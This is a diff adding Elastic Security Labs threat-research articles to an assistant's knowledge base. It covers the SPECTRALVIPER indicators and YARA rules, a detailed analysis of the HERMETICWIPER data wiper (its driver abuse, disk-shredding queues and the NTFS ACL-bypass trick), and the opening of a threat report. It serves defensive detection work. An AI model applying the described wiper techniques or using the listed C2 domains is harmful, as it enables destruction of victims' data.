+![REF2754 Diamond Model](/assets/images/elastic-charms-spectralviper/image12.png)
+
+## Observed adversary tactics and techniques
+
+Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- [Initial access](https://attack.mitre.org/tactics/TA0001)
+- [Execution](https://attack.mitre.org/tactics/TA0002)
+- [Defense evasion](https://attack.mitre.org/tactics/TA0005)
+- [Discovery](https://attack.mitre.org/tactics/TA0007)
+- [Lateral movement](https://attack.mitre.org/tactics/TA0008/)
+- [Collection](https://attack.mitre.org/tactics/TA0009)
+- [Command and control](https://attack.mitre.org/tactics/TA0011)
+
+### Techniques / Sub techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+- [Gather host information](https://attack.mitre.org/techniques/T1592/)
+- [Gather victim network information](https://attack.mitre.org/techniques/T1590/)
+- [Network share discovery](https://attack.mitre.org/techniques/T1135/)
+- [Remote system discovery](https://attack.mitre.org/techniques/T1018/)
+- [File and directory discovery](https://attack.mitre.org/techniques/T1083/)
+- [Process discovery](https://attack.mitre.org/techniques/T1057/)
+- [System service discovery](https://attack.mitre.org/techniques/T1007/)
+- [System owner/user discovery](https://attack.mitre.org/techniques/T1033/)
+- [Process injection](https://attack.mitre.org/techniques/T1055/)
+- [Masquerading](https://attack.mitre.org/techniques/T1036/)
+- [Application layer protocol: Web protocols](https://attack.mitre.org/techniques/T1071/001/)
+- [Access Token Manipulation: Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003/)
+
+## Detection logic
+
+### Preventions
+
+All of the malware discussed in this research publication have protections included in Elastic Defend.
+
+- [Windows.Trojan.SpectralViper](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_SpectralViper.yar)
+- [Windows.Trojan.PowerSeal](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_PowerSeal.yar)
+- [Windows.Trojan.P8Loader](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_P8Loader.yar)
+
+### YARA
+
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify SPECTRALVIPER, POWERSEAL, and P8LOADER
+
+```
+rule Windows_Trojan_SpectralViper_1 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-04-13"
+        last_modified = "2023-05-26"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "SpectralViper"
+        threat_name = "Windows.Trojan.SpectralViper"
+        reference_sample = "7e35ba39c2c77775b0394712f89679308d1a4577b6e5d0387835ac6c06e556cb"
+       license = "Elastic License v2"
+
+    strings:
+        $a1 = { 13 00 8D 58 FF 0F AF D8 F6 C3 01 0F 94 44 24 26 83 FD 0A 0F 9C 44 24 27 4D 89 CE 4C 89 C7 48 89 D3 48 89 CE B8 }
+        $a2 = { 15 00 8D 58 FF 0F AF D8 F6 C3 01 0F 94 44 24 2E 83 FD 0A 0F 9C 44 24 2F 4D 89 CE 4C 89 C7 48 89 D3 48 89 CE B8 }
+        $a3 = { 00 8D 68 FF 0F AF E8 40 F6 C5 01 0F 94 44 24 2E 83 FA 0A 0F 9C 44 24 2F 4C 89 CE 4C 89 C7 48 89 CB B8 }
+        $a4 = { 00 48 89 C6 0F 29 30 0F 29 70 10 0F 29 70 20 0F 29 70 30 0F 29 70 40 0F 29 70 50 48 C7 40 60 00 00 00 00 48 89 C1 E8 }
+        $a5 = { 41 0F 45 C0 45 84 C9 41 0F 45 C0 EB BA 48 89 4C 24 08 89 D0 EB B1 48 8B 44 24 08 48 83 C4 10 C3 56 57 53 48 83 EC 30 8B 05 }
+        $a6 = { 00 8D 70 FF 0F AF F0 40 F6 C6 01 0F 94 44 24 25 83 FF 0A 0F 9C 44 24 26 89 D3 48 89 CF 48 }
+        $a7 = { 48 89 CE 48 89 11 4C 89 41 08 41 0F 10 01 41 0F 10 49 10 41 0F 10 51 20 0F 11 41 10 0F 11 49 20 0F 11 51 30 }
+        $a8 = { 00 8D 58 FF 0F AF D8 F6 C3 01 0F 94 44 24 22 83 FD 0A 0F 9C 44 24 23 48 89 D6 48 89 CF 4C 8D }
+    condition:
+        5 of them
+}
+```
+
+```
+rule Windows_Trojan_SpectralViper_2 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-10"
+        last_modified = "2023-05-10"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "SpectralViper"
+        threat_name = "Windows.Trojan.SpectralViper"
+        reference_sample = "d1c32176b46ce171dbce46493eb3c5312db134b0a3cfa266071555c704e6cff8"
+       license = "Elastic License v2"
+
+    strings:
+        $a1 = { 18 48 89 4F D8 0F 10 40 20 0F 11 47 E0 0F 10 40 30 0F 11 47 F0 48 8D }
+        $a2 = { 24 27 48 83 C4 28 5B 5D 5F 5E C3 56 57 53 48 83 EC 20 48 89 CE 48 }
+        $a3 = { C7 84 C9 0F 45 C7 EB 86 48 8B 44 24 28 48 83 C4 30 5B 5F 5E C3 48 83 }
+        $s1 = { 40 53 48 83 EC 20 48 8B 01 48 8B D9 48 8B 51 10 48 8B 49 08 FF D0 48 89 43 18 B8 04 00 00 }
+        $s2 = { 40 53 48 83 EC 20 48 8B 01 48 8B D9 48 8B 49 08 FF D0 48 89 43 10 B8 04 00 00 00 48 83 C4 20 5B }
+        $s3 = { 48 83 EC 28 4C 8B 41 18 4C 8B C9 48 B8 AB AA AA AA AA AA AA AA 48 F7 61 10 48 8B 49 08 48 C1 EA }
+    condition:
+        2 of ($a*) or any of ($s*)
+}
+```
+
+```
+rule Windows_Trojan_PowerSeal_1 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-03-16"
+        last_modified = "2023-05-26"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "PowerSeal"
+        threat_name = "Windows.Trojan.PowerSeal"
+        license = "Elastic License v2"
+
+    strings:
+        $a1 = "PowerSeal.dll" wide fullword
+        $a2 = "InvokePs" ascii fullword
+        $a3 = "amsiInitFailed" wide fullword
+        $a4 = "is64BitOperatingSystem" ascii fullword
+    condition:
+        all of them
+}
+```
+
+```
+rule Windows_Trojan_PowerSeal_2 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-10"
+        last_modified = "2023-05-10"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "PowerSeal"
+        threat_name = "Windows.Trojan.PowerSeal"
+        license = "Elastic License v2"
+
+    strings:
+        $a1 = "[+] Loading PowerSeal"
+        $a2 = "[!] Failed to exec PowerSeal"
+        $a3 = "AppDomain: unable to get the name!"
+    condition:
+        2 of them
+}
+```
+
+```
+rule Windows_Trojan_P8Loader {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-04-13"
+        last_modified = "2023-05-26"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "P8Loader"
+        threat_name = "Windows.Trojan.P8Loader"
+        license = "Elastic License v2"
+
+    strings:
+        $a1 = "\t[+] Create pipe direct std success\n" fullword
+        $a2 = "\tPEAddress: %p\n" fullword
+        $a3 = "\tPESize: %ld\n" fullword
+        $a4 = "DynamicLoad(%s, %s) %d\n" fullword
+        $a5 = "LoadLibraryA(%s) FAILED in %s function, line %d" fullword
+        $a6 = "\t[+] No PE loaded on memory\n" wide fullword
+        $a7 = "\t[+] PE argument: %ws\n" wide fullword
+        $a8 = "LoadLibraryA(%s) FAILED in %s function, line %d" fullword
+    condition:
+        5 of them
+}
+```
+
+## References
+
+The following were referenced throughout the above research:
+
+- [https://www.elastic.co/security-labs/hunting-memory](https://www.elastic.co/security-labs/hunting-memory)
+- [https://www.elastic.co/security-labs/phoreal-malware-targets-the-southeast-asian-financial-sector](https://www.elastic.co/security-labs/phoreal-malware-targets-the-southeast-asian-financial-sector)
+- [https://www.elastic.co/security-labs/twice-around-the-dance-floor-with-pipedance](https://www.elastic.co/security-labs/twice-around-the-dance-floor-with-pipedance)
+- [https://www.microsoft.com/en-us/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/](https://www.microsoft.com/en-us/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/)
+- [https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide)
+
+## Observations
+
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/spectralviper) in both ECS and STIX format in a combined zip bundle.
+
+The following observables were discussed in this research.
+
+| Observable                                                       | Type    | Name                                      | Reference                            |
+| ---------------------------------------------------------------- | ------- | ----------------------------------------- | ------------------------------------ |
+| 56d2d05988b6c23232b013b38c49b7a9143c6649d81321e542d19ae46f4a4204 | SHA-256 | -                                         | SPECTRALVIPER Related to 1.dll below |
+| d1c32176b46ce171dbce46493eb3c5312db134b0a3cfa266071555c704e6cff8 | SHA-256 | 1.dll                                     | SPECTRALVIPER                        |
+| 7e35ba39c2c77775b0394712f89679308d1a4577b6e5d0387835ac6c06e556cb | SHA-256 | asdgb.exe                                 | SPECTRALVIPER                        |
+| 4e3a88cf00e0b4718e7317a37297a185ff35003192e5832f5cf3020c4fc45966 | SHA-256 | Settings.db                               | SPECTRALVIPER                        |
+| 7b5e56443812eed76a94077763c46949d1e49cd7de79cde029f1984e0d970644 | SHA-256 | Microsoft.MicrosoftEdge_8wekyb3d8bbwe.pkg | SPECTRALVIPER                        |
+| 5191fe222010ba7eb589e2ff8771c3a75ea7c7ffc00f0ba3f7d716f12010dd96 | SHA-256 | UpdateConfig.json                         | SPECTRALVIPER                        |
+| 4775fc861bc2685ff5ca43535ec346495549a69891f2bf45b1fcd85a0c1f57f7 | SHA-256 | Microsoft.OneDriveUpdatePackage.mca       | SPECTRALVIPER                        |
+| 2482c7ececb23225e090af08feabc8dec8d23fe993306cb1a1f84142b051b621 | SHA-256 | ms-certificates.sst                       | SPECTRALVIPER                        |
+| stablewindowsapp[.]com                                           | Domain  | n/a                                       | C2                                   |
+| webmanufacturers[.]com                                           | Domain  | n/a                                       | C2                                   |
+| toppaperservices[.]com                                           | Domain  | n/a                                       | C2                                   |
+| hosting-wordpress-services[.]com                                 | Domain  | n/a                                       | C2                                   |
+| appointmentmedia[.]com                                           | Domain  | n/a                                       | C2                                   |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_protects_against_data_wiper_malware_targeting_ukraine_hermeticwiper.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_protects_against_data_wiper_malware_targeting_ukraine_hermeticwiper.md
new file mode 100644
index 0000000000000..b4b271f75ffe0
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_protects_against_data_wiper_malware_targeting_ukraine_hermeticwiper.md
@@ -0,0 +1,248 @@
+---
+title: "Elastic protects against data wiper malware targeting Ukraine: HERMETICWIPER"
+slug: "elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper"
+date: "2022-09-09"
+description: "Analysis of the HERMETICWIPER malware targeting Ukranian organizations."
+author:
+  - slug: daniel-stepanic
+  - slug: mark-mager
+  - slug: remco-sprooten
+  - slug: jake-king
+  - slug: andrew-pease
+image: "photo-edited-11@2x.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - hermeticwiper
+  - malware
+---
+
+## Introduction
+
+On February 23, 2022, the ESET threat research team [disclosed a series of findings](https://twitter.com/ESETresearch/status/1496581903205511181) pertaining to a Data Wiper malware campaign, impacting hundreds of systems across Ukraine, named [HERMETICWIPER](https://twitter.com/juanandres_gs/status/1496607141888724997). Elastic previously published research on [Operation Bleeding Bear](https://www.elastic.co/security-labs/operation-bleeding-bear), a campaign targeted towards Ukrainian assets with similar destructive intentions.
+
+Malware Wipers remain a common tactic of adversaries looking to cause havoc on systems impacted by their payloads. Typically this class of malware is designed to wipe the contents of any drives a system may have, rendering the end-users personal data lost. Many more recent examples of this class of payload incorporate tactics that also tamper with the boot process, with HERMETICWIPER being no exception.
+
+Customers leveraging the Elastic Agent version 7.9+, and above are protected against this specific malware, with further research being undertaken to improve detection efficacy.
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-8.png)
+
+## Malware Wipers & Ukrainian Targets
+
+Unfortunately, this is not the first time this year that Ukranian systems have been the target of Data-wiping payloads - Microsoft [published findings](https://therecord.media/microsoft-data-wiping-malware-disguised-as-ransomware-targets-ukraine-again/) pertaining to similar, observed attacks that impacted systems within Ukraine, however initially impacting a far smaller number of systems. The publication outlined that the targeting of this specific earlier campaign was focused on multiple government agencies, non-profits, and information technology organizations throughout the country.
+
+## Malware Stage Analysis
+
+HERMETICWIPER is digitally signed by Hermetica Digital Ltd., an organization [registered](https://opencorporates.com/companies/cy/HE419469) in Cyprus, and embeds 4 legitimate driver files from [EaseUS Partition Manager](https://www.easeus.com/partition-manager) that are compressed using MS-DOS utility (mscompress). Hermetica Digital Ltd. has revoked the code-signing certificate.
+
+Upon execution, HERMETICWIPER creates a kernel mode service and interacts with it via DeviceIoControl API function. The main objective is to corrupt any attached physical drive and render the system data unrecoverable.
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-20.png)
+
+Below is a summary of the events generated during the installation phase using, Windows events logs and Elastic Agent.
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-16.jpg)
+
+Following the installation process, HERMETICWIPER determines the dimensions of each partition by calculating the bytes in each sector and sectors in each cluster using the GetDiskFreeSpaceW Windows API [function](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-getdiskfreespacew).
+
+The malware interacts with the IOCTL interface, passing the parameter IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS with a value of 0x560000 to the device driver in order to retrieve the physical location of the root driver (\\.\C). The root drive corresponds to the volume Windows uses to boot, and its identification is essential to achieve a destructive impact.
+
+The NTFS/FAT boot sector and random file physical offsets are enumerated for each accessible physical drive, and then overwritten by the output of the CryptGenRandom [API function](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptgenrandom) and a series of FSCTL_GET_RETRIEVAL_POINTERS and FSCTL_MOVE_FILE IOCTLs.
+
+Once the system crashes or restarts, the system is unable to boot and the data is corrupted.
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-15.jpg)
+
+## Interesting Functionality
+
+Similar to different ransomware families, HERMETICWIPER avoids specific critical folders and files during the wiping process. This ensures the machine is still operable and will not impact the disk wiping/file corrupting process at a later stage.
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-13.jpg)
+
+Another interesting technique observed when targeted files are queued for wiping is how they are accessed by concatenating the value ::$INDEX_ALLOCATION to a filename. This documented [NTFS trick](https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/) is an additional method to bypass access-control list (ACL) permissions on targeted files to provide more reliability when accessing these files.
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-19.jpg)
+
+HERMETICWIPER also modifies two registry settings during execution (ShowCompColor and ShowInfoTip), setting those key values to 0. Within Windows, when a user chooses to compress NTFS directories/files, there is a setting that allows the user to differentiate them in Windows Explorer showing them as blue representing compressed data or green for encrypted data. This is an attempt by the malware to not set off any suspicious behavior to the user with different coloring on directories/files before the disk corruption occurs on the machine.
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-6.jpg)
+
+## Shredding Component Analysis
+
+The malware wipes specific target folders/files writing pre-generated random data at specific disk addresses. It does this by setting up 4 different shredding queues in the binary.
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-3.jpg)
+
+Each queue usage and its functionality is undetermined, but are used at different points in the sample. The shredding queue is composed of a linked list of targets which contain random pre-generated data (generated at queuing) of the size of the target, the disk number and a linked list of “file” parts with disk addresses and sizes.
+
+```
+HERMETICWIPER Structure for ShredTarget function
+
+struct ctf::ShredTarget
+{
+ctf::ShredTarget *p_next;
+ctf::ShredTarget *p_prev;
+ctf::FilePart *p_parts;
+int disk_number;
+uint8_t *p_random_filled_buffer;
+int p_random_filled_buffer_size;
+};
+```
+
+```
+HERMETICWIPER Structure for FilePart function
+
+struct ctf::FilePart
+{
+ctf::FilePart *p_next;
+ctf::FilePart *p_prev;
+uint64_t start_address;
+uint64_t size;
+};
+```
+
+```
+HERMETICWIPER targeting file, folder, and disk partitions
+
+ctf::QueueFileShred
+ctf::QueueFolderShred
+ctf::callback::IfPathContainNtUserQueueFileShred
+ctf::callback::QueueNtfsBitmapAndLogAttributeShred
+ctf::callback::QueueFileShredIfNotSymlink
+ctf::callback::QueuePartitionFirstClusterShred
+ctf::callback::QueuePartitionShred
+```
+
+The malware emphasizes the following items that are targeted for shredding.
+
+- The dropped driver if something goes wrong or after service start:
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-4.jpg)
+
+- The malware process itself if driver launch goes wrong:
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-image-21.jpg)
+
+- The disk’s partition first cluster (enumerates up to 100):
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-7.jpg)
+
+- The System Volume information direct used to store Windows restore points:
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-14.jpg)
+
+Interestingly if the computer doesn’t belong to a domain controller it will target more assets:
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-5.jpg)
+
+After queuing the different targets previously described, the sample starts different synchronous/asynchronous shredding threads for each of its queues:
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-10.jpg)
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-12.jpg)
+
+The thread launcher will then start a new thread for each target.
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-9.jpg)
+
+The shredding thread will then iterate through the target’s file parts and use the driver for writing at addresses on specified disk.
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-17.jpg)
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-1.jpg)
+
+## Driver Analysis
+
+The driver that is loaded by the user mode component is quite similar to the driver that belongs to Eldos Rawdisk and has been leveraged previously by threat actors like [Shamoon](https://securelist.com/shamoon-the-wiper-further-details-part-ii/57784/) and Lazarus. The difference is that HERMETICWIPER abuses a driver (epmntdrv.sys) that belongs to EaseUS Partition Master, a legitimate disk partitioning software.
+
+When the driver is loaded, it creates a device named \\Device\\EPMNTDRV and creates a symbolic link to be exposed to user mode. Then, it initializes the driver object with the following entry points.
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-2.jpg)
+
+Looking at the dispatch function that handles the IRP_MJ_CREATE requests, we can see that the driver builds the name of the symlink \Device\HarddiskX\Partition0 and saves a pointer to its file object on the driver’s file object fs context. The driver then uses the volume manager device object to obtain a pointer to the highest level device object in the disk device stack.
+
+After that, it iterates over the stack looking for the Disk driver, that is the Microsoft storage class driver that implements functionality common to all storage devices. Once found, it saves a pointer to its device object in the FsContext2 field of the file object structure.
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-11.jpg)
+
+Moving to the function that handles the write requests, we can see that it builds an asynchronous [Input Output Request Packet](https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/i-o-request-packets) (IRP), which is an API used for drivers to communicate with each other, and forwards it the volume manager device. The buffer used in the IRP is described by the [Memory Descriptor List](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_mdl) (MDL) driver function. Finally, a completion routine is provided that will free the MDL and release memory used by the IRP.
+
+![](/assets/images/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper/malware-targeting-ukraine-hermeticwiper-18.png)
+
+The read requests are similar to the write requests in concept, in other words, the IoBuildsynchronousFsdRequest() [API function](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iobuildsynchronousfsdrequest) uses the IRP_MJ_READ [driver function](https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/irp-mj-read) instead of the IRP_MJ_WRITE [driver function](https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/irp-mj-write) when sending the IRP to the driver. Finally, the routine that handles I/O control codes finds the highest device object in the stack where the volume manager is located and calls IoBuildDeviceIoControlRequest() to forward the IRP that contains the I/O control code to the appropriate driver.
+
+> All in all, the driver functionality is very simple. It acts as a proxy between user space and the low level file system drivers, allowing raw disk sector manipulation and as a result circumventing Windows operating system security features.
+
+## Prebuilt Detection Engine Alerts
+
+The following existing [public detection rules](https://github.com/elastic/detection-rules) can also be used to detect some of the employed post exploitation techniques described by Symantec Threat Intelligence Team and ESET [[1](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine)][[2](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia)][[3](https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/)] :
+
+- [Suspicious Cmd Execution via WMI](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_suspicious_cmd_wmi.toml) (Deployment of wiper via Impacket WMI)
+- [Direct Outbound SMB Connection](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_direct_outbound_smb_connection.toml) (SMB spreader)
+- [Remotely Started Services via RPC](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_remote_services.toml) (Remcom)
+- [Lateral Tool Transfer](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_executable_tool_transfer_smb.toml) (staging PE via file shares for remote execution)
+- [Potential Credential Access via Windows Utilities](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_cmdline_dump_tool.toml)
+- [Potential Credential Access via LSASS Memory Dump](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_suspicious_lsass_access_memdump.toml)
+- [Process Execution from an Unusual Directory](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_from_unusual_directory.toml)
+- [Execution from Unusual Directory - Command Line](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_from_unusual_path_cmdline.toml)
+- [Scheduled Task Execution](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_suspicious_scheduled_task_runtime.toml)
+- [Scheduled Task Creation](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_local_scheduled_task_creation.toml)
+- [Suspicious MSHTA Execution](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_mshta_beacon.toml)
+
+## YARA Rules
+
+```
+rule Windows_Wiper_HERMETICWIPER {
+    meta:
+        Author = "Elastic Security"
+        creation_date = "2022-02-24"
+        last_modified = "2022-02-24"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Wiper"
+        family = "HERMETICWIPER"
+        threat_name = "Windows.Wiper.HERMETICWIPER"
+        description = "Detects HERMETICWIPER used to target Ukrainian organization"
+        reference_sample = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
+
+    strings:
+        $a1 = "\\\\?\\C:\\Windows\\System32\\winevt\\Logs" wide fullword
+        $a2 = "\\\\.\\EPMNTDRV\\%u" wide fullword
+        $a3 = "tdrv.pdb" ascii fullword
+        $a4 = "%s%.2s" wide fullword
+        $a5 = "ccessdri" ascii fullword
+        $a6 = "Hermetica Digital"
+    condition:
+        all of them
+}
+
+```
+
+## Observables
+
+| Observable                                                       | Type    | Reference     | Note          |
+| ---------------------------------------------------------------- | ------- | ------------- | ------------- |
+| 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 | SHA-256 | Wiper malware | HERMETICWIPER |
+| 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da | SHA-256 | Wiper malware | HERMETICWIPER |
+| 3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 | SHA-256 | Wiper malware | HERMETICWIPER |
+| 2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf | SHA-256 | Wiper malware | HERMETICWIPER |
+
+## Artifacts
+
+Artifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt42ce05ad40a762e8/628e88d9bd980555189d997b/hermeticwiper-indicators.zip) in both ECS and STIX format in a combined zip bundle.
+
+## References
+
+The following research was referenced throughout the document:
+
+- [https://twitter.com/ESETresearch/status/1496581903205511181](https://twitter.com/ESETresearch/status/1496581903205511181)
+- [https://twitter.com/juanandres_gs/status/1496607141888724997](https://twitter.com/juanandres_gs/status/1496607141888724997)
+- [https://elastic.co/security-labs/operation-bleeding-bear](https://elastic.co/security-labs/operation-bleeding-bear)
+- [https://therecord.media/microsoft-data-wiping-malware-disguised-as-ransomware-targets-ukraine-again/](https://therecord.media/microsoft-data-wiping-malware-disguised-as-ransomware-targets-ukraine-again/)
+- [https://opencorporates.com/companies/cy/HE419469](https://opencorporates.com/companies/cy/HE419469)
+- [https://www.easeus.com/partition-manager](https://www.easeus.com/partition-manager)
+- [https://docs.microsoft.com/en-us/windows/win32/devio/device-input-and-output-control-ioctl-](https://docs.microsoft.com/en-us/windows/win32/devio/device-input-and-output-control-ioctl-)
+- [https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-getdiskfreespacew](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-getdiskfreespacew)
+- [https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens)
+- [https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-findresourcew](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-findresourcew)
+- [https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadresource](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadresource)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_publishes_2023_global_threat_report_spring_edition.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_publishes_2023_global_threat_report_spring_edition.md
new file mode 100644
index 0000000000000..b10cb5deb0c8f
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_publishes_2023_global_threat_report_spring_edition.md
@@ -0,0 +1,29 @@
+---
+title: "Elastic publishes 2023 Global Threat Report Spring Edition"
+slug: "elastic-publishes-2023-global-threat-report-spring-edition"
+date: "2023-04-28"
+description: "This week, we’re publishing a new version of this report that’s online and interactive, which includes additional data covering the remainder of 2022, written using Elastic technologies."
+author:
+  - slug: devon-kerr
+image: "download_(1).jpg"
+category:
+  - slug: reports
+tags:
+  - gtr
+---
+
+Last November, Elastic [published](https://www.elastic.co/security-labs/2022-elastic-global-threat-report-announcement) our inaugural global threat report: a summary of threat trends, forecasts, and recommendations based on analyzing millions of telemetry events shared by users around the world. This report is an important part of our continued commitment to transparency, our mission to protect the world's data, as well as a snapshot of our global threat visibility.
+
+This week, we’re publishing a new version of this report that’s [online](https://ela.st/gtr) and interactive, which includes additional data covering the remainder of 2022, written using Elastic. We’d like to offer a few thoughts on this interactive report and share findings both forecasted and unexpected. Let’s take a look at the 2023 Global Threat Report Spring edition!
+
+![Elastic Global Threat Report Spring Edition](/assets/images/elastic-publishes-2023-global-threat-report-spring-edition/image1.png)
+
+First, let’s talk about malware: - We observed consistent trends throughout 2022, with the same approximate ratios of different malware types in all geographies - Trojans, cryptominers, and ransomware held the top spots - Linux and Windows continued to see higher rates of malware than MacOS
+
+Next, consider these cloud observations: - Credential access attempts beat out every other tactic for Microsoft Azure, Google Cloud, and AWS as forecast - Brute force techniques remained steady along with token theft
+
+But there were also a few new findings: - Impairing defenses by tampering with cloud logging functionality was one of the most common techniques we observed in the later part of 2022 and continues into 2023 - This likely impacted visibility of other techniques due to missing data sources, and is potentially a reaction to improvements in cloud logging - XMRig prevalence exploded on MacOS, likely as a result of macroeconomic conditions
+
